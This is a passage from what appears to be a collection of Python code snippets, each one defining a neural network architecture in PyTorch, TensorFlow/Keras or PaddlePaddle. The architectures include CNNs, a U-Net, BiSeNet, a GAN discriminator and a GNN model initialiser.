128,3,1,2\n self.conv2 = nn.Conv2d(in_ch, out_ch, ker_size, padding=(ker_size-1)//2)\n self.pool2 = nn.MaxPool2d(patch_size, pool_stride) \n strides += (conv_stride, pool_stride)\n ## conv3: \n ## meant for repeated invocation, must have same in_ch, out_ch and strides of 1\n in_ch = out_ch\n out_ch, ker_size, conv_stride, pool_stride = in_ch,2,1,1\n self.conv3 = nn.Conv2d(in_ch, out_ch, ker_size, padding=1)\n self.pool3 = nn.MaxPool2d(patch_size, pool_stride) \n# strides += (conv_stride, pool_stride)\n ## figure out the number of nodes needed for entry into fc:\n in_size_for_fc = out_ch * (32 // np.prod(strides)) ** 2 ## (A)\n self.in_size_for_fc = in_size_for_fc\n self.fc1 = nn.Linear(in_size_for_fc, 150)\n self.fc2 = nn.Linear(150, 100)\n self.fc3 = nn.Linear(100, 10)", "def unet_network(input_tensor, nb_classes):\n # contraction 1\n conv1 = Conv2D(\n filters=64,\n kernel_size=(3, 3),\n activation='relu',\n name='conv1')(\n input_tensor) # (batch_size, ?, ?, 64)\n conv2 = Conv2D(\n filters=64,\n kernel_size=(3, 3),\n activation='relu',\n name='conv2')(\n conv1) # (batch_size, ?, ?, 64)\n crop2 = Cropping2D(\n cropping=((88, 88), (88, 88)),\n name=\"crop2\")(\n conv2) # (batch_size, ?, ?, 64)\n maxpool2 = MaxPooling2D(\n pool_size=(3, 3),\n strides=(2, 2),\n name=\"maxpool2\")(\n conv2) # (batch_size, ?, ?, 64)\n\n # contraction 2\n conv3 = Conv2D(\n filters=128,\n kernel_size=(3, 3),\n activation='relu',\n name='conv3')(\n maxpool2) # (batch_size, ?, ?, 128)\n conv4 = Conv2D(\n filters=128,\n kernel_size=(3, 3),\n activation='relu',\n name='conv4')(\n conv3) # (batch_size, ?, ?, 128)\n crop4 = Cropping2D(\n cropping=((40, 40), (40, 40)),\n name=\"crop4\")(\n conv4) # (batch_size, ?, ?, 128)\n maxpool4 = MaxPooling2D(\n pool_size=(3, 3),\n strides=(2, 2),\n name=\"maxpool4\")(\n conv4) # ((batch_size, ?, ?, 128)\n\n # contraction 3\n conv5 = Conv2D(\n filters=256,\n kernel_size=(3, 3),\n activation='relu',\n name='conv5')(\n maxpool4) # (batch_size, ?, ?, 256)\n conv6 = Conv2D(\n filters=256,\n kernel_size=(3, 3),\n activation='relu',\n name='conv6')(\n conv5) # (batch_size, ?, ?, 256)\n crop6 = Cropping2D(\n cropping=((16, 16), (16, 16)),\n name=\"crop6\")(\n conv6) # (batch_size, ?, ?, 256)\n maxpool6 = MaxPooling2D(\n pool_size=(3, 3),\n strides=(2, 2),\n name=\"maxpool6\")(\n conv6) # (batch_size, ?, ?, 256)\n\n # contraction 4\n conv7 = Conv2D(\n filters=512,\n kernel_size=(3, 3),\n activation='relu',\n name='conv7')(\n maxpool6) # (batch_size, ?, ?, 512)\n conv8 = Conv2D(\n filters=512,\n kernel_size=(3, 3),\n activation='relu',\n name='conv8')(\n conv7) # (batch_size, ?, ?, 512)\n crop8 = Cropping2D(\n cropping=((4, 4), (4, 4)),\n name=\"crop8\")(\n conv8) # (batch_size, ?, ?, 512)\n maxpool8 = MaxPooling2D(\n pool_size=(3, 3),\n strides=(2, 2),\n name=\"maxpool8\")(\n conv8) # (batch_size, ?, ?, 512)\n\n # bottom\n conv9 = Conv2D(\n filters=1024,\n kernel_size=(3, 3),\n activation='relu',\n name='conv9')(\n maxpool8) # (batch_size, ?, ?, 1024)\n conv10 = Conv2D(\n filters=1024,\n kernel_size=(3, 3),\n activation='relu',\n name='conv10')(\n conv9) # (batch_size, ?, ?, 1024)\n\n # expansion 1\n upconv11 = up_conv_2d(\n input_tensor=conv10,\n nb_filters=512,\n name='upconv11') # (batch_size, ?, ?, 512)\n concat11 = tf.concat(\n values=[crop8, upconv11],\n axis=-1,\n name='concat11') # (batch_size, ?, ?, 1024)\n conv12 = Conv2D(\n filters=512,\n kernel_size=(3, 3),\n activation='relu',\n name='conv12')(\n concat11) # (batch_size, ?, ?, 512)\n conv13 = Conv2D(\n filters=512,\n kernel_size=(3, 3),\n activation='relu',\n name='conv13')(\n conv12) # (batch_size, ?, ?, 512)\n\n # expansion 2\n upconv14 = up_conv_2d(\n input_tensor=conv13,\n nb_filters=256,\n name='upconv14') # (batch_size, ?, ?, 256)\n concat14 = tf.concat(\n values=[crop6, upconv14],\n axis=-1,\n name='concat14') # (batch_size, ?, ?, 512)\n conv15 = Conv2D(\n filters=256,\n kernel_size=(3, 3),\n activation='relu',\n name='conv15')(\n concat14) # (batch_size, ?, ?, 256)\n conv16 = Conv2D(\n filters=256,\n kernel_size=(3, 3),\n activation='relu',\n name='conv16')(\n conv15) # (batch_size, ?, ?, 256)\n\n # expansion 3\n upconv17 = up_conv_2d(\n input_tensor=conv16,\n nb_filters=128,\n name='upconv17') # (batch_size, ?, ?, 128)\n concat17 = tf.concat(\n values=[crop4, upconv17],\n axis=-1,\n name='concat17') # (batch_size, ?, ?, 256)\n conv18 = Conv2D(\n filters=128,\n kernel_size=(3, 3),\n activation='relu',\n name='conv18')(\n concat17) # (batch_size, ?, ?, 128)\n conv19 = Conv2D(\n filters=128,\n kernel_size=(3, 3),\n activation='relu',\n name='conv19')(\n conv18) # (batch_size, ?, ?, 128)\n\n # expansion 4\n upconv20 = up_conv_2d(\n input_tensor=conv19,\n nb_filters=64,\n name='upconv20') # (batch_size, ?, ?, 64)\n concat20 = tf.concat(\n values=[crop2, upconv20],\n axis=-1,\n name='concat20') # (batch_size, ?, ?, 128)\n conv21 = Conv2D(\n filters=64,\n kernel_size=(3, 3),\n activation='relu',\n name='conv21')(\n concat20) # (batch_size, ?, ?, 64)\n conv22 = Conv2D(\n filters=64,\n kernel_size=(3, 3),\n activation='relu',\n name='conv22')(\n conv21) # (batch_size, ?, ?, 64)\n conv23 = Conv2D(\n filters=nb_classes,\n kernel_size=(1, 1),\n activation='sigmoid',\n name='conv23')(\n conv22) # (batch_size, ?, ?, nb_classes)\n\n return conv23", "def __cnnNetFn(self, input, is_training):\n with tf.variable_scope('CNN'):\n conv1 = tf.layers.conv2d(input, 32, 3, activation=\"elu\", padding='SAME',\n kernel_regularizer=tf.contrib.layers.l2_regularizer(self.__weight_decay))\n conv1_bn = tf.layers.batch_normalization(conv1)\n conv2 = tf.layers.conv2d(conv1_bn, 32, 3, activation=\"elu\", padding='SAME',\n kernel_regularizer=tf.contrib.layers.l2_regularizer(self.__weight_decay))\n conv2_bn = tf.layers.batch_normalization(conv2)\n conv2_pool = tf.layers.max_pooling2d(conv2_bn, 2, 2, padding='SAME')\n conv2_drop = tf.layers.dropout(conv2_pool, rate=0.2, training=is_training)\n\n conv3 = tf.layers.conv2d(conv2_drop, 64, 3, activation=\"elu\", padding='SAME',\n kernel_regularizer=tf.contrib.layers.l2_regularizer(self.__weight_decay))\n conv3_bn = tf.layers.batch_normalization(conv3)\n conv4 = tf.layers.conv2d(conv3_bn, 64, 3, activation=\"elu\", padding='SAME',\n kernel_regularizer=tf.contrib.layers.l2_regularizer(self.__weight_decay))\n conv4_bn = tf.layers.batch_normalization(conv4)\n conv4_pool = tf.layers.max_pooling2d(conv4_bn, 2, 2, padding='SAME')\n conv4_drop = tf.layers.dropout(conv4_pool, rate=0.3, training=is_training)\n\n conv5 = tf.layers.conv2d(conv4_drop, 128, 3, activation=\"elu\", padding='SAME',\n kernel_regularizer=tf.contrib.layers.l2_regularizer(self.__weight_decay))\n conv5_bn = tf.layers.batch_normalization(conv5)\n conv6 = tf.layers.conv2d(conv5_bn, 128, 3, activation=\"elu\", padding='SAME',\n kernel_regularizer=tf.contrib.layers.l2_regularizer(self.__weight_decay))\n conv6_pool = tf.layers.max_pooling2d(conv6, 2, 2, padding='SAME')\n\n csnn_features = tf.stop_gradient(self.__csnn.getTrainOp(input))\n csnn_features = tf.identity(csnn_features)\n if self.__use_csnn:\n joint_features = tf.concat((conv6_pool, csnn_features), axis=3)\n else:\n joint_features = conv6_pool\n\n conv6_bn = tf.layers.batch_normalization(joint_features)\n\n conv7 = tf.layers.conv2d(conv6_bn, 256, 3, activation=\"elu\", padding='SAME',\n kernel_regularizer=tf.contrib.layers.l2_regularizer(self.__weight_decay))\n conv7_bn = tf.layers.batch_normalization(conv7)\n conv8 = tf.layers.conv2d(conv7_bn, 256, 3, activation=\"elu\", padding='SAME',\n kernel_regularizer=tf.contrib.layers.l2_regularizer(self.__weight_decay))\n conv8_bn = tf.layers.batch_normalization(conv8)\n conv8_pool = tf.layers.max_pooling2d(conv8_bn, 2, 2, padding='SAME')\n conv8_drop = tf.layers.dropout(conv8_pool, rate=0.4, training=is_training)\n\n flat = tf.contrib.layers.flatten(conv8_drop)\n logits = tf.layers.dense(flat, self.__num_classes)\n return logits, csnn_features", "def __init__(self, args):\n \n super(MicroNet, self).__init__()\n self.conv1 = nn.Conv2d(3, 1, kernel_size=1)\n self.conv2 = nn.Conv2d(1, 29, kernel_size=5)\n self.maxpool2 = nn.MaxPool2d(3, stride=2 , ceil_mode=True)\n self.conv3 = nn.Conv2d(29, 59, kernel_size=3)\n self.maxpool3 = nn.MaxPool2d(3, stride=2 , ceil_mode=True)\n self.conv4 = nn.Conv2d(59, 74, kernel_size=3)\n self.maxpool4 = nn.MaxPool2d(3, stride=2 , ceil_mode=True)\n self.conv2_drop = nn.Dropout2d()\n self.conv3_drop = nn.Dropout2d()\n self.fc1 = nn.Linear(1184, 300)\n self.fc2 = nn.Linear(300, args.num_classes)\n self.conv0_bn = nn.BatchNorm2d(3)\n self.conv1_bn = nn.BatchNorm2d(1)\n self.conv2_bn = nn.BatchNorm2d(29)\n self.conv3_bn = nn.BatchNorm2d(59)\n self.conv4_bn = nn.BatchNorm2d(74)\n self.dense1_bn = nn.BatchNorm1d(300)", "def __init__(self):\n super(CNN, self).__init__()\n\n self.conv0 = nn.Conv2d(3, 3, kernel_size=5, stride=1, padding=0)\n nn.init.xavier_uniform_(self.conv0.weight)\n\n self.conv1 = nn.Conv2d(3, 30, kernel_size=5, stride=2, padding=0)\n self.conv1.weight = nn.Parameter(get_filters())\n\n self.pool1 = nn.MaxPool2d(kernel_size=2, stride=2, padding=0)\n\n self.conv2 = nn.Conv2d(30, 16, kernel_size=3, stride=1, padding=0)\n nn.init.xavier_uniform_(self.conv2.weight)\n\n self.conv3 = nn.Conv2d(16, 16, kernel_size=3, stride=1, padding=0)\n nn.init.xavier_uniform_(self.conv3.weight)\n\n self.conv4 = nn.Conv2d(16, 16, kernel_size=3, stride=1, padding=0)\n nn.init.xavier_uniform_(self.conv4.weight)\n\n self.pool2 = nn.MaxPool2d(kernel_size=2, stride=2, padding=0)\n\n self.conv5 = nn.Conv2d(16, 16, kernel_size=3, stride=1, padding=0)\n nn.init.xavier_uniform_(self.conv5.weight)\n\n self.conv6 = nn.Conv2d(16, 16, kernel_size=3, stride=1, padding=0)\n nn.init.xavier_uniform_(self.conv6.weight)\n\n self.conv7 = nn.Conv2d(16, 16, kernel_size=3, stride=1, padding=0)\n nn.init.xavier_uniform_(self.conv7.weight)\n\n self.conv8 = nn.Conv2d(16, 16, kernel_size=3, stride=1, padding=0)\n nn.init.xavier_uniform_(self.conv8.weight)\n\n self.fc = nn.Linear(16 * 5 * 5, 2)\n\n self.drop1 = nn.Dropout(p=0.5) # used only for the NC dataset", "def __init__(self, layers, input_size):\n super(ConvNetMaker, self).__init__()\n self.conv_layers = []\n self.fc_layers = []\n # h, w, d = 32, 32, 3\n h, w, d = input_size, input_size, 3\n previous_layer_filter_count = 3\n previous_layer_size = h * w * d\n num_fc_layers_remained = len([1 for l in layers if l.startswith('FC')])\n for layer in layers:\n if layer.startswith('Conv'):\n filter_count = int(layer[4:])\n self.conv_layers += [\n nn.Conv2d(previous_layer_filter_count,\n filter_count,\n kernel_size=3,\n padding=1),\n nn.BatchNorm2d(filter_count),\n nn.ReLU(inplace=True)\n ]\n\n previous_layer_filter_count = filter_count\n d = filter_count\n previous_layer_size = h * w * d\n elif layer.startswith('MaxPool'):\n self.conv_layers += [nn.MaxPool2d(kernel_size=2, stride=2)]\n h, w = int(h / 2.0), int(w / 2.0)\n previous_layer_size = h * w * d\n elif layer.startswith('FC'):\n num_fc_layers_remained -= 1\n current_layer_size = int(layer[2:])\n if num_fc_layers_remained == 0:\n self.fc_layers += [nn.Linear(previous_layer_size,\n current_layer_size)]\n else:\n self.fc_layers += [nn.Linear(previous_layer_size,\n current_layer_size),\n nn.ReLU(inplace=True)]\n previous_layer_size = current_layer_size\n\n conv_layers = self.conv_layers\n fc_layers = self.fc_layers\n self.conv_layers = nn.Sequential(*conv_layers)\n self.fc_layers = nn.Sequential(*fc_layers)", "def build_bisenet(inputs, num_classes):\n\n ### The spatial path\n ### The number of feature maps for each convolution is not specified in the paper\n ### It was chosen here to be equal to the number of feature maps of a classification\n ### model at each corresponding stage\n # spatial_net = fluid.layers.resize_bilinear(inputs, [Image_Height/8, Image_Width/8])\n # print('spatial_net_1',spatial_net)\n\n ## spatial path\n spatial_net = ConvBlock(inputs, num_filters=64, kernel_size=3, stride=2)\n spatial_net = ConvBlock(spatial_net, num_filters=128, kernel_size=3, stride=2)\n spatial_net = ConvBlock(spatial_net, num_filters=256, kernel_size=3, stride=2)\n # print(\"spatial_net:\", spatial_net)\n\n # spatial_net = fluid.layers.resize_bilinear(spatial_net, [Image_Height/8, Image_Width/8])\n # print('spatial_net_2',spatial_net)\n ### Context path\n model = ResNet(is_test=False)\n # spatial_net = model.bottleneck_block1(inputs)\n end_points_16, end_points_32 = model.net(inputs)\n net_4 = AttentionRefinementModule(end_points_16, num_filters=512)\n net_5 = AttentionRefinementModule(end_points_32, num_filters=1024)\n global_channels = fluid.layers.reduce_mean(net_5, [2, 3], keep_dim=True)\n net_5_scaled = fluid.layers.elementwise_mul(net_5, global_channels, axis=0)\n\n ### Combining the paths\n net_4 = Upsample(net_4, scale=2)\n net_5_scaled = Upsample(net_5_scaled, scale=4)\n # print('net_4, net_5:', [net_4, net_5_scaled])\n # layers_concat = list()\n # layers_concat.append(spatial_net)\n ## layers_concat.append(net_4)\n # layers_concat.append(net_5_scaled)\n context_net = fluid.layers.concat([spatial_net, net_4, net_5_scaled], axis=1) #\n # context_net = fluid.layers.concat(input=layers_concat,axis=1)\n # print('context_net', context_net)\n # context_net = fluid.layers.concat([net_4, net_5_scaled], axis=1)\n # print('context_net', context_net)\n # context_net = fluid.layers.concat([spatial_net,context_net], axis=1)\n # print('context_net2',context_net)\n\n ### FFM\n # net = FeatureFusionModule(input_1=spatial_net, input_2=context_net, num_filters=num_classes)\n net = FeatureFusionModule(inputs=context_net, num_filters=num_classes)\n\n # print('net', net)\n\n ## [batch_zize, num_filters, 128, 64]\n\n ### Final upscaling and finish\n # net = fluid.layers.conv2d_transpose(input=net, num_filters=num_classes, output_size=[256, 128])\n # print('conv2d_transpose', net)\n net = batch_normalization(net, relu=True, name='conv2d_transpose_bn1')\n net = fluid.layers.conv2d_transpose(input=net, num_filters=num_classes, output_size=[128, 256])\n net = batch_normalization(net, relu=True, name='conv2d_transpose_bn2')\n net = fluid.layers.conv2d_transpose(input=net, num_filters=num_classes, output_size=[256, 512])\n net = batch_normalization(net, relu=True, name='conv2d_transpose_bn3')\n #net = fluid.layers.conv2d_transpose(input=net, num_filters=num_classes, output_size=[512, 1024])\n #net = batch_normalization(net, relu=True, name='conv2d_transpose_bn4')\n # print('net',net)\n net = fluid.layers.image_resize(net, out_shape=[512, 1024], resample='BILINEAR')\n\n net = fluid.layers.conv2d(net, num_classes, 1)\n return net", "def __init__(self):\n super(SCNN, self).__init__()\n\n # Linear classifier.\n self.inplanes = 128\n self._norm_layer = nn.BatchNorm2d\n self.dilation = 1\n self.groups = 1\n self.base_width = 64\n\n self.num_class = 125\n backbone = torchvision.models.resnet34(pretrained=True)\n self.shared_features = nn.Sequential(*list(backbone.children())[0:6])\n #self.realistic_head = nn.Sequential(*list(backbone.children())[6:8])\n # self.synthetic_head = nn.Sequential(nn.Conv2d(128, 128, 3, 2, 1), nn.BatchNorm2d(128), nn.ReLU(inplace=True),\n # nn.Conv2d(128, 128, 3, 1, 1), nn.BatchNorm2d(128), nn.ReLU(inplace=True),\n # nn.Conv2d(128, 256, 3, 2, 1), nn.BatchNorm2d(256), nn.ReLU(inplace=True),\n # nn.Conv2d(256, 256, 3, 1, 1), nn.BatchNorm2d(256), nn.ReLU(inplace=True))\n\n self.synthetic_head1 = self._make_layer(BasicBlock, 128, 1, stride=2, dilate=False)\n self.synthetic_head2 = self._make_layer(BasicBlock, 256, 1, stride=2, dilate=False)\n self.avgpool = nn.AdaptiveAvgPool2d((1, 1))\n self.classifier = nn.Linear(256, self.num_class)\n\n for m in self.synthetic_head1.modules():\n if isinstance(m, nn.Conv2d):\n nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')\n elif isinstance(m, (nn.BatchNorm2d, nn.GroupNorm)):\n nn.init.constant_(m.weight, 1)\n nn.init.constant_(m.bias, 0)\n\n for m in self.synthetic_head2.modules():\n if isinstance(m, nn.Conv2d):\n nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')\n elif isinstance(m, (nn.BatchNorm2d, nn.GroupNorm)):\n nn.init.constant_(m.weight, 1)\n nn.init.constant_(m.bias, 0)\n\n weight_init(self.classifier)\n\n for param in self.shared_features.parameters():\n param.requires_grad = False", "def __init__(self, resnet, num_classes):\n super(FineTune, self).__init__()\n\n # Everything except the last linear layer\n self.features = nn.Sequential(*list(resnet.children())[:-1])\n num_ftrs = resnet.fc.in_features\n self.classifier = nn.Sequential(\n nn.Linear(num_ftrs, num_classes)\n )\n\n # # Freeze those weights\n # for param in self.features.parameters():\n # param.requires_grad = False", "def __init__(self, config, input_shp):\n\n # Run initialization for super class\n super(MyNetwork, self).__init__()\n\n # Store configuration\n self.config = config\n\n # Placeholder for layers\n self.layers = {}\n indim = input_shp[0]\n\n # Retrieve Conv, Act, Pool functions from configurations. We'll use\n # these for our code below.\n if config.conv2d == \"torch\":\n self.Conv2d = nn.Conv2d\n elif config.conv2d == \"custom\":\n self.Conv2d = ConvBlock\n self.Activation = getattr(nn, config.activation)\n self.Pool2d = getattr(nn, config.pool2d)\n self.Linear = nn.Linear\n\n # Resnet Blocks, similar to slide 73 of lecture 21. However, for\n # simplicity, we'll make is slightly different. Note that we used\n # nn.Sequential this time.\n self.convs = nn.Sequential()\n cur_h, cur_w = input_shp[-2:]\n for _i in range(config.num_conv_outer):\n #\n # NOTE THE NEW LAYER ON THESE LINES!\n #\n # We have a dedicated 1x1 layer to get more channels. Note also\n # that this is a pure linear convolution layer.\n outdim = config.nchannel_base * 2 ** _i\n self.convs.add_module(\n \"conv_{}_base\".format(_i), nn.Conv2d(indim, outdim, 1, 1, 0))\n indim = outdim\n for _j in range(config.num_conv_inner):\n # We now use our selected convolution layer. Note that our\n # resnet implementation will have a different call style to\n # vanilla conv2d of torch, so we'll just do an ugly if-else\n # here.\n if config.conv2d == \"torch\":\n self.convs.add_module(\n \"conv_{}_{}\".format(_i, _j),\n self.Conv2d(indim, outdim, config.ksize, 1, 1))\n self.convs.add_module(\n \"act_{}_{}\".format(_i, _j),\n self.Activation())\n cur_h = cur_h - (config.ksize - 1)\n cur_w = cur_w - (config.ksize - 1)\n elif config.conv2d == \"custom\":\n self.convs.add_module(\n \"conv_{}_{}\".format(_i, _j),\n self.Conv2d(indim, outdim, config.ksize, 1, self.Activation))\n self.convs.add_module(\n \"conv_{}_pool\".format(_i), self.Pool2d(2, 2))\n cur_h = cur_h // 2\n cur_w = cur_w // 2\n\n # Final output layer. We'll assume that conv layer outputs are global\n # average pooled\n self.output = nn.Linear(indim, config.num_class)\n\n print(self)", "def __init__(self):\r\n\r\n super(Net, self).__init__()\r\n\r\n\r\n pre= models.inception_v3(pretrained=True)\r\n # Freeze model weights\r\n for param in pre.parameters():\r\n param.requires_grad = False\r\n\r\n n_inputs = pre.fc.in_features\r\n n_inputsaux = pre.AuxLogits.fc.in_features\r\n\r\n pre.fc = nn.Sequential(\r\n nn.Linear(n_inputs, 2000),\r\n nn.ReLU(inplace=True),\r\n nn.Dropout(0.4),\r\n nn.BatchNorm1d(2000),\r\n )\r\n\r\n pre.AuxLogits.fc = nn.Linear(n_inputsaux, 6)\r\n\r\n self.firstlayers = pre\r\n\r\n self.fc1 = nn.Sequential(\r\n nn.Linear(2000, 1500),\r\n nn.ReLU(inplace=True),\r\n nn.Dropout(0.4),\r\n nn.BatchNorm1d(1500),\r\n nn.Linear(1500, 1500),\r\n nn.ReLU(inplace=True),\r\n nn.Dropout(0.4),\r\n nn.BatchNorm1d(1500),\r\n nn.Linear(1500, 1000),\r\n nn.ReLU(inplace=True),\r\n nn.BatchNorm1d(1000),\r\n nn.Linear(1000, 1000),\r\n nn.ReLU(inplace=True),\r\n nn.BatchNorm1d(1000),\r\n nn.Linear(1000, 1000),\r\n nn.ReLU(inplace=True),\r\n nn.BatchNorm1d(1000),\r\n nn.Linear(1000, 1000),\r\n nn.ReLU(inplace=True),\r\n nn.BatchNorm1d(1000),\r\n nn.Linear(1000, 1000),\r\n nn.ReLU(inplace=True),\r\n nn.BatchNorm1d(1000),\r\n nn.Linear(1000, 1000),\r\n nn.ReLU(inplace=True),\r\n nn.BatchNorm1d(1000),\r\n nn.Linear(1000, 800),\r\n nn.ReLU(),\r\n nn.BatchNorm1d(800),\r\n nn.Linear(800, 800),\r\n nn.ReLU(),\r\n )\r\n\r\n self.fc2 = nn.Sequential(\r\n nn.Linear(800, 600),\r\n nn.ReLU(),\r\n nn.BatchNorm1d(600),\r\n nn.Linear(600, 400),\r\n nn.ReLU(),\r\n nn.Linear(400, 300),\r\n nn.ReLU(),\r\n nn.BatchNorm1d(300),\r\n nn.Linear(300, 200),\r\n nn.ReLU(),\r\n nn.BatchNorm1d(200),\r\n nn.Linear(200, 100),\r\n nn.ReLU(),\r\n nn.Linear(100, 50),\r\n nn.ReLU(),\r\n nn.Linear(50, 6),\r\n nn.Sigmoid()\r\n )\r\n\r\n # Spatial transformer localization-network\r\n self.localization = nn.Sequential(\r\n nn.Conv2d(3, 8, kernel_size=20),\r\n nn.ReLU(True),\r\n nn.Conv2d(8, 10, kernel_size=15, padding=1),\r\n nn.ReLU(True),\r\n nn.Conv2d(10, 10, kernel_size=15, padding=1),\r\n nn.ReLU(True),\r\n nn.Conv2d(10, 10, kernel_size=15, padding=1),\r\n nn.ReLU(True),\r\n nn.Conv2d(10, 10, kernel_size=10, padding=1),\r\n nn.ReLU(True),\r\n nn.Conv2d(10, 10, kernel_size=8, padding=1),\r\n nn.ReLU(True),\r\n nn.Conv2d(10, 10, kernel_size=8, padding=1),\r\n nn.ReLU(True),\r\n nn.Conv2d(10, 10, kernel_size=8, padding=1),\r\n nn.ReLU(True),\r\n nn.Conv2d(10, 10, kernel_size=8, padding=1),\r\n nn.MaxPool2d(2, stride=2),\r\n nn.ReLU(True),\r\n nn.Conv2d(10, 10, kernel_size=8, padding=1),\r\n nn.MaxPool2d(2, stride=2),\r\n nn.ReLU(True),\r\n nn.Conv2d(10, 10, kernel_size=5, padding=1),\r\n nn.ReLU(True),\r\n nn.Conv2d(10, 10, kernel_size=5, padding=1),\r\n nn.MaxPool2d(2, stride=2),\r\n nn.ReLU(True),\r\n nn.Conv2d(10, 10, kernel_size=5, padding=1),\r\n nn.ReLU(True),\r\n nn.Conv2d(10, 10, kernel_size=5, padding=1),\r\n nn.ReLU(True),\r\n nn.Conv2d(10, 10, kernel_size=5),\r\n nn.ReLU(True)\r\n\r\n )\r\n\r\n # Regressor for the 3 * 2 affine matrix\r\n self.fc_loc = nn.Sequential(\r\n nn.Linear(10 * 15 * 15, 32),\r\n nn.ReLU(True),\r\n nn.Linear(32, 3 * 2)\r\n )\r\n\r\n # Initialize the weights/bias with identity transformation\r\n self.fc_loc[2].weight.data.zero_()\r\n self.fc_loc[2].bias.data.copy_(torch.tensor([1, 0, 0, 0, 1, 0], dtype=torch.float))\r\n\r\n self.phase = 0", "def __init__(self, conv_features_sizes, linear_layer_sizes, connector_shape):\n super().__init__()\n \n self.conv = nn.Sequential()\n self.mlp = nn.Sequential()\n self.flat = nn.Flatten()\n\n self.conv.add_module(name=f\"e-fconv{0}\", module=_conv2d_block(1, conv_features_sizes[0], kernel_size=3, padding=1))\n self.conv.add_module(name=f\"e-max{0}\", module=nn.MaxPool2d(2, 2))\n for i, (in_size, out_size) in enumerate(zip(conv_features_sizes[:-1], conv_features_sizes[1:]), 1):\n self.conv.add_module(name=f\"e-fconv{i}\", module=_conv2d_block(in_size, out_size, kernel_size=3, padding=1))\n self.conv.add_module(name=f\"e-max{i}\", module=nn.MaxPool2d(2, 2))\n\n mlp_input_shape = int(reduce((lambda x,y: x * y), connector_shape))\n self.mlp.add_module(name=f\"e-linear{0}\", module=nn.Linear(mlp_input_shape, linear_layer_sizes[0]))\n self.mlp.add_module(name=f\"e-batchnorm{0}\", module=nn.BatchNorm1d(linear_layer_sizes[0]))\n self.mlp.add_module(name=f\"e-relu{0}\", module=nn.ReLU())\n for i, (in_size, out_size) in enumerate(zip(linear_layer_sizes[:-1], linear_layer_sizes[1:]), 1):\n self.mlp.add_module(name=f\"e-linear{i}\", module=nn.Linear(in_size, out_size))\n self.mlp.add_module(name=f\"e-batchnorm{i}\", module=nn.BatchNorm1d(out_size))\n self.mlp.add_module(name=f\"e-relu{i}\", module=nn.ReLU())", "def __init__(self, input_nc, ndf=64, n_layers=3, norm_layer=nn.BatchNorm2d, no_antialias=True):\n super(NLayerTFDiscriminator, self).__init__()\n if type(norm_layer) == functools.partial: # no need to use bias as BatchNorm2d has affine parameters\n use_bias = norm_layer.func == nn.InstanceNorm2d\n else:\n use_bias = norm_layer == nn.InstanceNorm2d\n\n kw = 4\n padw = 1\n if(no_antialias):\n sequence = [nn.Conv2d(input_nc, ndf, kernel_size=kw, stride=2, padding=padw), nn.LeakyReLU(0.2, True)]\n else:\n sequence = [nn.Conv2d(input_nc, ndf, kernel_size=kw, stride=1, padding=padw), nn.LeakyReLU(0.2, True), Downsample(ndf)]\n nf_mult = 1\n nf_mult_prev = 1\n for n in range(1, n_layers): # gradually increase the number of filters\n nf_mult_prev = nf_mult\n nf_mult = min(2 ** n, 8)\n if(no_antialias):\n sequence += [\n nn.Conv2d(ndf * nf_mult_prev, ndf * nf_mult, kernel_size=kw, stride=2, padding=padw, bias=use_bias),\n norm_layer(ndf * nf_mult),\n nn.LeakyReLU(0.2, True)\n ]\n else:\n sequence += [\n nn.Conv2d(ndf * nf_mult_prev, ndf * nf_mult, kernel_size=kw, stride=1, padding=padw, bias=use_bias),\n norm_layer(ndf * nf_mult),\n nn.LeakyReLU(0.2, True),\n Downsample(ndf * nf_mult)]\n nf_mult_prev = nf_mult\n nf_mult = min(2 ** n_layers, 8)\n sequence += [\n nn.Conv2d(ndf * nf_mult_prev, ndf * nf_mult, kernel_size=3, stride=1, padding=padw, bias=use_bias),\n norm_layer(ndf * nf_mult),\n nn.LeakyReLU(0.2, True)\n ]\n self.encoder = nn.Sequential(*sequence)\n dim = ndf * nf_mult\n self.transformer_enc = transformer.TransformerDecoders(dim, nhead=4, num_encoder_layers=4, dim_feedforward=dim*2, dropout=0.0)\n\n self.query_embed = nn.Embedding(1, dim)\n self.classifier = nn.Sequential(\n nn.Linear(dim, dim//2),\n nn.LayerNorm(dim//2),\n nn.ReLU(),\n nn.Linear(dim//2, dim//4),\n nn.LayerNorm(dim//4),\n nn.ReLU(),\n nn.Linear(dim//4, 1),\n nn.Sigmoid()\n )", "def __init__(self, fsmt_layer, config):\n super().__init__(config)\n self.in_proj_weight = nn.Parameter(torch.cat([fsmt_layer.self_attn.q_proj.weight, fsmt_layer.self_attn.k_proj.weight, fsmt_layer.self_attn.v_proj.weight]))\n self.in_proj_bias = nn.Parameter(torch.cat([fsmt_layer.self_attn.q_proj.bias, fsmt_layer.self_attn.k_proj.bias, fsmt_layer.self_attn.v_proj.bias]))\n self.out_proj_weight = fsmt_layer.self_attn.out_proj.weight\n self.out_proj_bias = fsmt_layer.self_attn.out_proj.bias\n self.linear1_weight = fsmt_layer.fc1.weight\n self.linear1_bias = fsmt_layer.fc1.bias\n self.linear2_weight = fsmt_layer.fc2.weight\n self.linear2_bias = fsmt_layer.fc2.bias\n self.norm1_eps = fsmt_layer.self_attn_layer_norm.eps\n self.norm1_weight = fsmt_layer.self_attn_layer_norm.weight\n self.norm1_bias = fsmt_layer.self_attn_layer_norm.bias\n self.norm2_eps = fsmt_layer.final_layer_norm.eps\n self.norm2_weight = fsmt_layer.final_layer_norm.weight\n self.norm2_bias = fsmt_layer.final_layer_norm.bias\n self.num_heads = fsmt_layer.self_attn.num_heads\n self.embed_dim = fsmt_layer.self_attn.embed_dim\n self.is_last_layer = False\n self.validate_bettertransformer()", "def __init__(self):\n super(CustomNetwork, self).__init__()\n self.fc1 = nn.Linear(28*28, 500)\n self.fc2 = nn.Linear(500, 256)\n self.fc3 = nn.Linear(256, 10)\n self.loss = Loss()", "def __init__(\n self, \n dim_feat_raw, \n dim_feat_smooth, \n dim_label_raw, \n dim_label_smooth, \n arch_gnn, \n aug_feat,\n num_ensemble, \n train_params\n ):\n super().__init__()\n self.mulhead = 1\n self.num_layers = arch_gnn[\"num_layers\"]\n self.dropout, self.dropedge = train_params[\"dropout\"], train_params['dropedge']\n self.mulhead = int(arch_gnn[\"heads\"]) # only useful for GAT\n\n self.branch_sharing = arch_gnn['branch_sharing'] # only for ensemble\n\n self.type_feature_augment = aug_feat\n assert dim_feat_raw <= dim_feat_smooth, \"smoothened feature cannot have smaller shape than the original one\"\n # NOTE: dim_label_raw may be larger than dim_label_smooth ==> label is not used as input\n self.num_classes = 